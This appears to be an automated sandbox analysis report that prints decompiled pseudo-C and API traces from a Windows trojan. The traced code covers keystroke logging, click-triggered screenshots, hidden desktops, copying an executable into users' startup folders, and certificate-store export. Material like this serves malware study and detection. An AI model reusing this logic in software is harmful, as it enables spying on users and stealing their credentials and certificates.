        • LoadLibraryA.KERNEL32(gdi32.dll,?,?,?), ref: 0040BCFD
        • GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0040BD08
        • GetProcAddress.KERNEL32(?,CreateCompatibleDC), ref: 0040BD14
        • GetProcAddress.KERNEL32(?,CreateCompatibleBitmap), ref: 0040BD21
        • GetProcAddress.KERNEL32(?,GetDeviceCaps), ref: 0040BD2E
        • GetProcAddress.KERNEL32(?,SelectObject), ref: 0040BD3B
        • GetProcAddress.KERNEL32(?,BitBlt), ref: 0040BD48
        • GetProcAddress.KERNEL32(?,DeleteObject), ref: 0040BD55
        • GetProcAddress.KERNEL32(?,DeleteDC), ref: 0040BD62
        • LoadImageW.USER32 ref: 0040BE06
        • GetIconInfo.USER32(00000000,?), ref: 0040BE1B
        • GetCursorPos.USER32(?,?,?,?), ref: 0040BE29
        • DrawIcon.USER32 ref: 0040BEFA
        • lstrcmpiW.KERNEL32(?,-00000030,?,?,?), ref: 0040BF7B
        • FreeLibrary.KERNEL32(000001F4,?,?,?), ref: 0040C092
        • FreeLibrary.KERNEL32(?,?,?,?), ref: 0040C09C
        • FreeLibrary.KERNEL32(?,?,?,?), ref: 0040C0A6
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp
        Similarity
        • API ID: AddressProc$Library$Load$Free$Icon$CursorDrawImageInfolstrcmpi
        • String ID: BitBlt$CreateCompatibleBitmap$CreateCompatibleDC$CreateDCW$CreateStreamOnHGlobal$DISPLAY$DeleteDC$DeleteObject$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$GdiplusShutdown$GdiplusStartup$GetDeviceCaps$SelectObject$gdi32.dll$gdiplus.dll$ole32.dll
        • API String ID: 1554524784-1167942225
        • Opcode ID: d7ea89d9729986aa870de3a99d563870d3569629410302b83ad9d0027591cecc
        • Instruction ID: 55e603a521015cd6370ee3422382da327527dfc73b0936e801952f0175fbd47a
        • Opcode Fuzzy Hash: d7ea89d9729986aa870de3a99d563870d3569629410302b83ad9d0027591cecc
        • Instruction Fuzzy Hash: 93E1C471D0025AEBCF209FE5CC84AAEBAB9FF04341F14453BE615B22A0D7785945CF98
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 78%
        			E00413970(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4, char _a8) {
        				char _v536;
        				char _v540;
        				char _v544;
        				char _v644;
        				signed char _v648;
        				char _v748;
        				short _v760;
        				char _v764;
        				short _v772;
        				int _v776;
        				int _v780;
        				void _v781;
        				void* _v784;
        				char _v785;
        				void _v788;
        				void _v789;
        				void* _v792;
        				char _v793;
        				char _v797;
        				void* _v800;
        				void* _v804;
        				void* _v808;
        				char _v809;
        				int _v813;
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				void* __ebp;
        				int _t74;
        				int _t79;
        				intOrPtr* _t80;
        				int _t82;
        				void* _t84;
        				int _t88;
        				void* _t92;
        				int _t100;
        				int _t108;
        				void* _t113;
        				int _t130;
        				void* _t144;
        				void* _t146;
        				void* _t166;
        
        				_t166 = __fp0;
        				_t135 = __ecx;
        				_t148 =  &_v764;
        				_v781 = 0;
        				if(E004113D7(0, __ecx,  &_v764,  *0x4238fc) != 0) {
        					_v780 = _v760;
        					_t130 = E004135E9( &_v780, __ecx, _v764);
        					_v776 = _t130;
        					if(_t130 == 0) {
        						_v780 = 0;
        					}
        					_t71 = E0041147F( &_v764);
        				}
        				if(_v780 != 0x1e6) {
        					__eflags = _v780 - 0xc;
        					if(__eflags != 0) {
        						L41:
        						E0040C1C2(_v772);
        						return _v785;
        					}
        					_t74 = E0041317B(_t135, __eflags, 0x8889347b, 2);
        					_v776 = _t74;
        					__eflags = _t74;
        					if(_t74 == 0) {
        						L39:
        						__eflags = _a8 - 1;
        						if(_a8 == 1) {
        							E0040DC27(0, _t148,  *0x4238fc);
        						}
        						goto L41;
        					}
        					E00413140(0x19367401,  &_v748, 1);
        					_t79 = E0040F9A5( &_v760);
        					_t148 = GetFileAttributesExW;
        					__eflags = _t79;
        					if(_t79 == 0) {
        						L23:
        						_t80 =  *0x4238a4;
        						__imp__IsWellKnownSid( *_t80, 0x16);
        						__eflags = _t80 - 1;
        						if(__eflags != 0) {
        							_v789 = 0;
        							_t82 = ReadProcessMemory(0xffffffff, _t148,  &_v789, 1, 0);
        							__eflags = _t82;
        							if(_t82 == 0) {
        								L29:
        								_push( *((intOrPtr*)(_v780 + 4)));
        								_t84 = E004125D7(_t135, E0040B1F7,  *((intOrPtr*)(_v780 + 8)));
        								_t148 = 0x423900;
        								_v797 = E0040B1F7(_t84, 0, 0x423900,  &_v540, E0040B1F7, 0x423900);
        								L30:
        								__eflags = _v793 - 1;
        								if(_v793 == 1) {
        									_t88 = E0040DA89( &_v536, 0, _t148, 0,  &_v776);
        									__eflags = _t88;
        									_v813 = _t88 != 0;
        									__eflags = _v813;
        									if(_v813 != 0) {
        										E00413140(0x1a43533f,  &_v760, 1);
        										_t92 = CreateEventW(0x4238d8, 1, 0,  &_v772);
        										_t144 = _v788;
        										_v804 = _t92;
        										_v800 = _t144;
        										_push(0xffffffff);
        										__eflags = _t92;
        										if(_t92 != 0) {
        											WaitForMultipleObjects(2,  &_v792, 0, ??);
        										} else {
        											WaitForSingleObject(_t144, ??);
        										}
        										_t148 = CloseHandle;
        										__eflags = _v792;
        										if(_v792 != 0) {
        											CloseHandle(_v792);
        										}
        										CloseHandle(_v772);
        										CloseHandle(_t144);
        									}
        								}
        								L38:
        								E0040F995(_v780);
        								goto L39;
        							}
        							__eflags = _v789 - 0xe9;
        							if(_v789 != 0xe9) {
        								goto L29;
        							}
        							_t100 = GetFileAttributesExW(0x423d0e, 0x78f16360,  &_v788);
        							__eflags = _t100 - 1;
        							if(_t100 != 1) {
        								goto L29;
        							}
        							_push( *((intOrPtr*)(_v784 + 4)));
        							E004125D7(_t135, E0040B563,  *_v784);
        							_push(_a4);
        							_t148 = 0x423900;
        							_push( &_v544);
        							_v809 = E0040B563( &_v544, 0, _v800, 0x423900, E0040B563, __eflags, _t166);
        							VirtualFree(_v808, 0, 0x8000);
        							goto L30;
        						}
        						_v789 = E0040B8C3(__eflags);
        						goto L38;
        					} else {
        						goto L20;
        					}
        					while(1) {
        						L20:
        						_v781 = 0;
        						_t108 = ReadProcessMemory(0xffffffff, _t148,  &_v781, 1, 0);
        						__eflags = _t108;
        						if(_t108 == 0) {
        							goto L22;
        						}
        						__eflags = _v781 - 0xe9;
        						if(_v781 == 0xe9) {
        							goto L23;
        						}
        						L22:
        						Sleep(0x1f4);
        					}
        				}
        				if(E0040B4AC(_t71, _t135, _v772) != 0) {
        					E00413140(0x32901130,  &_v748, 1);
        					_t113 = CreateMutexW(0x4238d8, 1,  &_v760);
        					_v792 = _t113;
        					if(_t113 != 0) {
        						if(GetLastError() == 0xb7) {
        							CloseHandle(_v780);
        							_v780 = 0;
        						}
        						if(_v780 != 0) {
        							E00413DB2(_t135,  &_v644);
        							if((_v648 & 0x00000020) != 0) {
        								 *0x4238a0 =  *0x4238a0 | 0x00000010;
        							}
        							E0041D76E();
        							if(( *0x4238a0 & 0x00000010) != 0) {
        								ExitWindowsEx(0x14, 0x80000000);
        							}
        							E00413140(0x1a43533f,  &_v748, 1);
        							_t146 = OpenEventW(2, 0,  &_v760);
        							if(_t146 != 0) {
        								SetEvent(_t146);
        								CloseHandle(_t146);
        							}
        							E004136A6(1);
        							_v785 = 1;
        							CloseHandle(_v784);
        						}
        					}
        				}
        				goto L41;
        			}

        APIs
          • Part of subcall function 004113D7: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,00413996,?,?,00000000), ref: 004113FC
          • Part of subcall function 004113D7: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00413996,?,?,00000000), ref: 0041140F
        • CreateMutexW.KERNEL32(004238D8,00000001,?,32901130,?,00000001,?), ref: 00413A00
        • GetLastError.KERNEL32 ref: 00413A12
        • CloseHandle.KERNEL32(000001E6), ref: 00413A29
        • ExitWindowsEx.USER32(00000014,80000000), ref: 00413A6C
        • OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001), ref: 00413A8B
        • SetEvent.KERNEL32(00000000), ref: 00413A98
        • CloseHandle.KERNEL32(00000000), ref: 00413A9F
        • CloseHandle.KERNEL32(000001E6,00000001), ref: 00413AB1
        • ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,00000002,00000001,00000000,?,19367401,?,00000001,8889347B,00000002), ref: 00413B15
        • Sleep.KERNEL32(000001F4), ref: 00413B27
        • IsWellKnownSid.ADVAPI32(?,00000016,?,19367401,?,00000001,8889347B,00000002), ref: 00413B38
        • ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,00000000,00000001,00000000), ref: 00413B60
        • VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 00413BBF
        • GetFileAttributesExW.KERNEL32(00423D0E,78F16360,0000000C), ref: 00413B7C
          • Part of subcall function 004125D7: VirtualProtect.KERNEL32(0040B1F7,?,00000040,00000000,74B5F9B0,?,?,00413BDB,?,?), ref: 004125EC
          • Part of subcall function 004125D7: VirtualProtect.KERNEL32(0040B1F7,?,00000000,00000000,?,?,00413BDB,?,?), ref: 0041261F
        • CreateEventW.KERNEL32(004238D8,00000001,00000000,?,1A43533F,?,00000001,00000001,?,00000000,00423900,00000000,?,?,?), ref: 00413C3D
        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00413C56
        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00413C66
        • CloseHandle.KERNEL32(0000000C), ref: 00413C7C
        • CloseHandle.KERNEL32(?), ref: 00413C82
        • CloseHandle.KERNEL32(?), ref: 00413C85
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp
        Similarity
        • API ID: CloseHandle$CreateEventFileVirtual$MemoryProcessProtectReadWait$AttributesErrorExitFreeKnownLastMultipleMutexObjectObjectsOpenSingleSizeSleepWellWindows
        • String ID:
        • API String ID: 561470431-3916222277
        • Opcode ID: 9f686587aebf39e2301886090d941962f8539d00b6e159b05fa2e961732afdca
        • Instruction ID: f03512a9ec9464bac4412028b3ee93b44b6bbae5e79496805a5ec7fdfc4ace85
        • Opcode Fuzzy Hash: 9f686587aebf39e2301886090d941962f8539d00b6e159b05fa2e961732afdca
        • Instruction Fuzzy Hash: CF91D571508385AFD710EF61CD45EAF7BE8EF84705F00092EF584A61A1D778DA88CB9A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 81%
        			E0040B8C3(void* __eflags) {
        				char _v5;
        				char* _v12;
        				char _v16;
        				int _v20;
        				int _v24;
        				int _v28;
        				int _v32;
        				char _v56;
        				char _v88;
        				char _v608;
        				short _v1128;
        				char _v1648;
        				void* __edi;
        				void* __esi;
        				_Unknown_base(*)()* _t63;
        				int _t69;
        				char _t70;
        				char _t76;
        				int _t80;
        				char _t81;
        				char _t82;
        				char _t86;
        				char _t88;
        				WCHAR* _t98;
        				int _t99;
        				CHAR* _t110;
        				char* _t111;
        				WCHAR* _t112;
        				struct HINSTANCE__* _t113;
        				signed int _t114;
        				void* _t115;
        
        				_t112 =  &_v56;
        				_v5 = 0;
        				E004128DB(0xe1, _t112);
        				_t113 = LoadLibraryW(_t112);
        				if(_t113 == 0) {
        					L7:
        					return 0;
        				} else {
        					_t110 =  &_v88;
        					E004128A5(0xe2, _t110);
        					_t63 = GetProcAddress(_t113, _t110);
        					if(_t63 != 0) {
        						_push( &_v12);
        						_t106 =  &_v608;
        						_push( &_v608);
        						_v12 = 0x104;
        						if( *_t63() == 1) {
        							_t98 =  &_v1128;
        							__imp__SHGetFolderPathW(0, 7, 0xffffffff, 1, _t98);
        							if(_t98 == 0) {
        								_t106 =  &_v608;
        								_t99 = E0040CD11(_t106);
        								_v12 = _t99;
        								if(StrCmpNIW(_t106,  &_v1128, _t99) == 0) {
        									_t106 = _t115 + _v12 * 2 - 0x464;
        									_t109 =  &_v1128;
        									E0040C563(_t102 | 0xffffffff, _t115 + _v12 * 2 - 0x464,  &_v1128);
        									_v5 = 1;
        								}
        							}
        						}
        					}
        					FreeLibrary(_t113);
        					if(_v5 != 0) {
        						_v5 = 0;
        						_v28 = 0;
        						_t111 = L".exe";
        						do {
        							_v12 = 0;
        							_t69 = NetUserEnum(0, 0, 2,  &_v12, 0xffffffff,  &_v20,  &_v32,  &_v28);
        							_v24 = _t69;
        							__eflags = _t69;
        							if(_t69 == 0) {
        								L11:
        								__eflags = _v12;
        								if(_v12 == 0) {
        									goto L24;
        								}
        								_t114 = 0;
        								__eflags = _v20;
        								if(_v20 <= 0) {
        									L23:
        									NetApiBufferFree(_v12);
        									goto L24;
        								} else {
        									goto L13;
        								}
        								do {
        									L13:
        									_t80 = NetUserGetInfo(0,  *(_v12 + _t114 * 4), 0x17,  &_v16);
        									__eflags = _t80;
        									if(_t80 == 0) {
        										_t81 = _v16;
        										__eflags = _t81;
        										if(_t81 != 0) {
        											_t106 =  &_v608;
        											_t82 = E0041745A( *((intOrPtr*)(_t81 + 0x10)),  &_v608);
        											__eflags = _t82;
        											if(_t82 != 0) {
        												_t86 = E00411A47( &_v1128,  &_v608,  &_v608);
        												__eflags = _t86;
        												if(_t86 != 0) {
        													_t88 = E004117C9( &_v608);
        													__eflags = _t88;
        													if(_t88 != 0) {
        														__eflags = E00410672(0,  &_v608,  &_v1648, _t111, 6);
        														if(__eflags != 0) {
        															__eflags = E0040AFC2( &_v608, __eflags, 0,  &_v1648, 0);
        															if(__eflags != 0) {
        																_v5 = 1;
        																E0040B0EF( &_v608, _t109, __eflags,  *((intOrPtr*)(_v16 + 0x10)),  &_v1648);
        															}
        														}
        													}
        												}
        											}
        											NetApiBufferFree(_v16);
        										}
        									}
        									_t114 = _t114 + 1;
        									__eflags = _t114 - _v20;
        								} while (_t114 < _v20);
        								goto L23;
        							}
        							__eflags = _t69 - 0xea;
        							if(_t69 != 0xea) {
        								break;
        							}
        							goto L11;
        							L24:
        							__eflags = _v24 - 0xea;
        						} while (_v24 == 0xea);
        						_t70 =  &_v1128;
        						__imp__SHGetFolderPathW(0, 0x8007, 0xffffffff, 1, _t70);
        						__eflags = _t70;
        						if(_t70 == 0) {
        							__eflags = E00410672(0,  &_v1128,  &_v1648, _t111, 6);
        							if(__eflags != 0) {
        								_t76 = E0040AFC2(_t106, __eflags, 0,  &_v1648, 0);
        								__eflags = _t76;
        								if(_t76 != 0) {
        									_v5 = 1;
        								}
        							}
        						}
        						return _v5;
        					}
        					goto L7;
        				}
        			}

        APIs
        • LoadLibraryW.KERNEL32(?,74B05B60,74B5F9B0,00000000), ref: 0040B8E4
        • GetProcAddress.KERNEL32(00000000,?), ref: 0040B905
        • SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 0040B936
        • StrCmpNIW.SHLWAPI(?,?,00000000), ref: 0040B959
        • FreeLibrary.KERNEL32(00000000), ref: 0040B980
        • NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 0040B9B6
        • NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 0040B9EF
        • NetApiBufferFree.NETAPI32(?,?,?), ref: 0040BA88
        • NetApiBufferFree.NETAPI32(?), ref: 0040BA9B
        • SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 0040BABF
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp
        Similarity
        • API ID: Free$BufferFolderLibraryPathUser$AddressEnumInfoLoadProc
        • String ID: .exe
        • API String ID: 1753652487-4119554291
        • Opcode ID: 28af29929c37e48d46f0b592255cd30508a729fffb91e0edafbf8da08eb732f6
        • Instruction ID: 810bd5c617e1d4f916ef71f496c16c6fe06ccf2f9563f8eafb0e38ecd682ff66
        • Opcode Fuzzy Hash: 28af29929c37e48d46f0b592255cd30508a729fffb91e0edafbf8da08eb732f6
        • Instruction Fuzzy Hash: F16161B1900219AFDF10DBA4CC85EEE77BCEB45300F1041BAFA51F2191E7799A458B98
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 58%
        			E0040DAE4(void* _a4, WCHAR* _a8) {
        				WCHAR* _v5;
        				char _v12;
        				signed int _v16;
        				struct HINSTANCE__* _v20;
        				_Unknown_base(*)()* _v24;
        				struct _PROCESS_INFORMATION _v40;
        				struct _STARTUPINFOW _v108;
        				struct HINSTANCE__* _t28;
        				_Unknown_base(*)()* _t31;
        				WCHAR* _t49;
        				long _t50;
        				intOrPtr* _t52;
        
        				_v5 = 0;
        				_t28 = LoadLibraryA("userenv.dll");
        				_v20 = _t28;
        				if(_t28 != 0) {
        					_t52 = GetProcAddress(_t28, "CreateEnvironmentBlock");
        					_t31 = GetProcAddress(_v20, "DestroyEnvironmentBlock");
        					_v24 = _t31;
        					if(_t52 != 0 && _t31 != 0) {
        						_push(0);
        						_push(_a4);
        						_push( &_v16);
        						_v16 = 0;
        						if( *_t52() == 0) {
        							_v16 = 0;
        						}
        						_t50 = 0x44;
        						_v12 = 0;
        						E0040C275( &_v108,  &_v108, 0, _t50);
        						_t49 = _a8;
        						_v108.cb = _t50;
        						_v108.lpDesktop = 0;
        						if(_t49 == 0) {
        							_t49 =  &_v12;
        						}
        						asm("sbb eax, eax");
        						if(CreateProcessAsUserW(_a4, 0, _t49, 0, 0, 0,  ~_v16 & 0x00000400 | 0x04000000, _v16, 0,  &_v108,  &_v40) != 0) {
        							CloseHandle(_v40.hThread);
        							CloseHandle(_v40);
        							_v5 = _v40.dwProcessId != 0;
        						}
        						if(_v16 != 0) {
        							_v24(_v16);
        						}
        					}
        					FreeLibrary(_v20);
        				}
        				return _v5 & 0x000000ff;
        			}

        APIs
        • LoadLibraryA.KERNEL32(userenv.dll,00000000), ref: 0040DAF5
        • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 0040DB14
        • GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 0040DB20
        • CreateProcessAsUserW.ADVAPI32(?,00000000,0040B0D2,00000000,00000000,00000000,0040B0D2,0040B0D2,00000000,?,?,?,00000000,00000044), ref: 0040DB91
        • CloseHandle.KERNEL32(?), ref: 0040DBA4
        • CloseHandle.KERNEL32(?), ref: 0040DBA9
        • FreeLibrary.KERNEL32(?), ref: 0040DBC0
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp
        Similarity
        • API ID: AddressCloseHandleLibraryProc$CreateFreeLoadProcessUser
        • String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$userenv.dll
        • API String ID: 3080530829-1103369309
        • Opcode ID: 2834c3fb17eb2d6f4ddc8b917e2a142535ab476aae0f40bdbe87a5a39a1e05af
        • Instruction ID: f95e14c7cc715fe8d333727ee96610ab2e80e7a1872c68550967ef2049c4b714
        • Opcode Fuzzy Hash: 2834c3fb17eb2d6f4ddc8b917e2a142535ab476aae0f40bdbe87a5a39a1e05af
        • Instruction Fuzzy Hash: 7421F8B2D0021DABDF109FE5CC84DAEBBB8EF48344B10857AE511B21A0D6799E49CB64
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040A2BA(void* __ecx, void* __eflags, WCHAR* _a4) {
        				char _v5;
        				struct HWINSTA__* _v12;
        				struct HWINSTA__* _v16;
        				char _v32;
        				char _v48;
        				void* __esi;
        				struct HWINSTA__* _t23;
        				WCHAR* _t28;
        				int _t35;
        				struct HWINSTA__* _t41;
        				void* _t43;
        				WCHAR* _t45;
        				struct HDESK__* _t46;
        
        				_t43 = __ecx;
        				_t45 =  &_v32;
        				_v5 = 0;
        				E004128DB(0xcc, _t45);
        				_t23 = OpenWindowStationW(_t45, 0, 0x10000000);
        				_v12 = _t23;
        				if(_t23 != 0) {
        					L2:
        					_v16 = GetProcessWindowStation();
        					if(E0040A292(_t50, _v12) == 0) {
        						L13:
        						CloseWindowStation(_v12);
        						L14:
        						return _v5;
        					}
        					_t28 = _a4;
        					_a4 = _t28;
        					if(_t28 == 0) {
        						_t37 =  &_v48;
        						_a4 =  &_v48;
        						E004128DB(0xcd, _t37);
        					}
        					_t46 = OpenDesktopW(_a4, 0, 0, 0x10000000);
        					if(_t46 != 0) {
        						L7:
        						if(E0040A24D(_t43, _t54, GetThreadDesktop(GetCurrentThreadId()), _t46) != 0) {
        							L9:
        							_v5 = 1;
        							L10:
        							CloseDesktop(_t46);
        							if(_v5 != 0) {
        								goto L13;
        							}
        							goto L11;
        						}
        						_t35 = SetThreadDesktop(_t46);
        						_v5 = 0;
        						if(_t35 == 0) {
        							goto L10;
        						}
        						goto L9;
        					} else {
        						_t46 = CreateDesktopW(_a4, 0, 0, 0, 0x10000000, 0);
        						_t54 = _t46;
        						if(_t46 == 0) {
        							L11:
        							_t58 = _v16;
        							if(_v16 != 0) {
        								E0040A292(_t58, _v16);
        							}
        							goto L13;
        						}
        						goto L7;
        					}
        				}
        				_t41 = CreateWindowStationW(_t45, 0, 0x10000000, 0);
        				_v12 = _t41;
        				_t50 = _t41;
        				if(_t41 == 0) {
        					goto L14;
        				}
        				goto L2;
        			}

        APIs
        • OpenWindowStationW.USER32 ref: 0040A2DF
        • CreateWindowStationW.USER32 ref: 0040A2F2
        • GetProcessWindowStation.USER32 ref: 0040A303
        • OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0040A33E
        • CreateDesktopW.USER32 ref: 0040A352
        • GetCurrentThreadId.KERNEL32 ref: 0040A35E
        • GetThreadDesktop.USER32(00000000), ref: 0040A365
        • SetThreadDesktop.USER32(00000000,00000000,00000000), ref: 0040A377
        • CloseDesktop.USER32(00000000,00000000,00000000), ref: 0040A389
        • CloseWindowStation.USER32(?,?), ref: 0040A3A4
        Memory Dump Source
        • Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp
        Similarity
        • API ID: Desktop$StationWindow$Thread$CloseCreateOpen$CurrentProcess
        • String ID:
        • API String ID: 2917431391-0
        • Opcode ID: c95242f53e9d199ab307d43e8fe81ec9bf3c7e6ead32650eb1d2d2ebc124f542
        • Instruction ID: ce33420c460d4fc203bb69d98e577db3c4286264679efe3640b810355b57522c
        • Opcode Fuzzy Hash: c95242f53e9d199ab307d43e8fe81ec9bf3c7e6ead32650eb1d2d2ebc124f542
        • Instruction Fuzzy Hash: 9B214A75800358BFEF10ABA59D8899E7FA8EB45388F00417AFC01F3260D6398D558B69
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 91%
        			E00409FCC(MSG* _a4) {
        				char _v524;
        				char _v780;
        				char _v840;
        				char _v864;
        				short _v884;
        				intOrPtr* _v888;
        				intOrPtr _v900;
        				void* __edi;
        				void* __esi;
        				int _t25;
        				signed int _t27;
        				signed int _t32;
        				void* _t36;
        				intOrPtr _t39;
        				WCHAR* _t45;
        				MSG* _t54;
        				WCHAR* _t65;
        				intOrPtr* _t66;
        				signed int _t67;
        				void* _t69;
        
        				_t69 = (_t67 & 0xfffffff8) - 0x374;
        				_t54 = _a4;
        				if(_t54 == 0 || E004132A1() == 0) {
        					L20:
        					return TranslateMessage(_t54);
        				} else {
        					_t25 = _t54->message;
        					if(_t25 != 0x201) {
        						__eflags = _t25 - 0x100;
        						if(_t25 != 0x100) {
        							goto L20;
        						}
        						__eflags = _t54->wParam - 0x1b;
        						if(_t54->wParam == 0x1b) {
        							goto L20;
        						}
        						_t27 = GetKeyboardState( &_v780);
        						__eflags = _t27;
        						if(_t27 == 0) {
        							goto L20;
        						}
        						_t32 = ToUnicode(_t54->wParam, _t54->lParam & 0x000000ff,  &_v780,  &_v884, 9, 0);
        						__eflags = _t32;
        						if(_t32 <= 0) {
        							goto L20;
        						}
        						__eflags = _t32 - 1;
        						if(__eflags != 0) {
        							if(__eflags > 0) {
        								L18:
        								__eflags = 0;
        								 *((short*)(_t69 + 0x10 + _t32 * 2)) = 0;
        								_push( &_v884);
        								L19:
        								E00409E2F();
        								goto L20;
        							}
        							L17:
        							__eflags = _v884 - 0x20;
        							if(_v884 < 0x20) {
        								goto L20;
        							}
        							goto L18;
        						}
        						__eflags = _t54->wParam - 8;
        						if(_t54->wParam != 8) {
        							goto L17;
        						}
        						_push(0x4017b0);
        						goto L19;
        					}
        					EnterCriticalSection(0x422988);
        					if( *0x422980 > 0) {
        						 *0x422980 =  *0x422980 + 0xffff;
        						_t36 = 2;
        						E004128DB(_t36,  &_v864);
        						_t39 = E0040BC07( &_v864, 0x1e, 0x1f4);
        						_v900 = _t39;
        						if(_t39 != 0) {
        							E004128DB(0,  &_v840);
        							_t65 =  &_v884;
        							E004128DB(1, _t65);
        							_t45 =  *0x4228ac; // 0x0
        							if(_t45 != 0) {
        								_t65 = _t45;
        							}
        							E0040CEB5( &_v840, 0x104,  &_v524,  &_v840);
        							_t66 = _v888;
        							E0040939C(0x104, _t66,  &_v524);
        							 *((intOrPtr*)( *_t66 + 8))(_t66, _t65,  *0x423b10, GetTickCount());
        						}
        					}
        					LeaveCriticalSection(0x422988);
        					goto L20;
        				}
        			}

        APIs
        • TranslateMessage.USER32(?), ref: 0040A123
          • Part of subcall function 004132A1: WaitForSingleObject.KERNEL32(00000000,0041A960,19367401,00000001), ref: 004132A9
        • EnterCriticalSection.KERNEL32(00422988), ref: 0040A006
        • LeaveCriticalSection.KERNEL32(00422988), ref: 0040A0A9
          • Part of subcall function 0040BC07: LoadLibraryA.KERNEL32(gdiplus.dll,?,?,?), ref: 0040BC39
          • Part of subcall function 0040BC07: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0040BC4A
          • Part of subcall function 0040BC07: GetProcAddress.KERNEL32(000001F4,GdiplusShutdown), ref: 0040BC57
          • Part of subcall function 0040BC07: GetProcAddress.KERNEL32(000001F4,GdipCreateBitmapFromHBITMAP), ref: 0040BC64
          • Part of subcall function 0040BC07: GetProcAddress.KERNEL32(000001F4,GdipDisposeImage), ref: 0040BC71
          • Part of subcall function 0040BC07: GetProcAddress.KERNEL32(000001F4,GdipGetImageEncodersSize), ref: 0040BC7E
          • Part of subcall function 0040BC07: GetProcAddress.KERNEL32(000001F4,GdipGetImageEncoders), ref: 0040BC8B
          • Part of subcall function 0040BC07: GetProcAddress.KERNEL32(000001F4,GdipSaveImageToStream), ref: 0040BC98
          • Part of subcall function 0040BC07: LoadLibraryA.KERNEL32(ole32.dll,?,?,?), ref: 0040BCE0
          • Part of subcall function 0040BC07: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0040BCEB
          • Part of subcall function 0040BC07: LoadLibraryA.KERNEL32(gdi32.dll,?,?,?), ref: 0040BCFD
          • Part of subcall function 0040BC07: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0040BD08
          • Part of subcall function 0040BC07: GetProcAddress.KERNEL32(?,CreateCompatibleDC), ref: 0040BD14
          • Part of subcall function 0040BC07: GetProcAddress.KERNEL32(?,CreateCompatibleBitmap), ref: 0040BD21
          • Part of subcall function 0040BC07: GetProcAddress.KERNEL32(?,GetDeviceCaps), ref: 0040BD2E
          • Part of subcall function 0040BC07: GetProcAddress.KERNEL32(?,SelectObject), ref: 0040BD3B
          • Part of subcall function 0040BC07: GetProcAddress.KERNEL32(?,BitBlt), ref: 0040BD48
          • Part of subcall function 0040BC07: GetProcAddress.KERNEL32(?,DeleteObject), ref: 0040BD55
        • GetTickCount.KERNEL32 ref: 0040A06B
        • GetKeyboardState.USER32(?), ref: 0040A0C3
        • ToUnicode.USER32 ref: 0040A0EB
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp
        Similarity
        • API ID: AddressProc$LibraryLoad$CriticalSection$CountEnterKeyboardLeaveMessageObjectSingleStateTickTranslateUnicodeWait
        • String ID:
        • API String ID: 2762424063-3916222277
        • Opcode ID: 230519dcdb3d7879d25143d2751b6cd7e0f0f6bc34fcb492d73e3fbad88a13db
        • Instruction ID: 22c010f7900b1c5b61657829600c43c232689f779824a798694b1c8c7b05aba1
        • Opcode Fuzzy Hash: 230519dcdb3d7879d25143d2751b6cd7e0f0f6bc34fcb492d73e3fbad88a13db
        • Instruction Fuzzy Hash: 2231C23160030597DB20AF64CD49A9B77A8EF40304F44493BF941FB1E2D778DCA587AA
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • CertOpenSystemStoreW.CRYPT32(00000000,0040179C), ref: 004099C4
        • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 004099E0
        • CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 004099EC
        • PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 00409A2B
        • PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 00409A5B
        • CharLowerW.USER32 ref: 00409A79
        • GetSystemTime.KERNEL32(?), ref: 00409A84
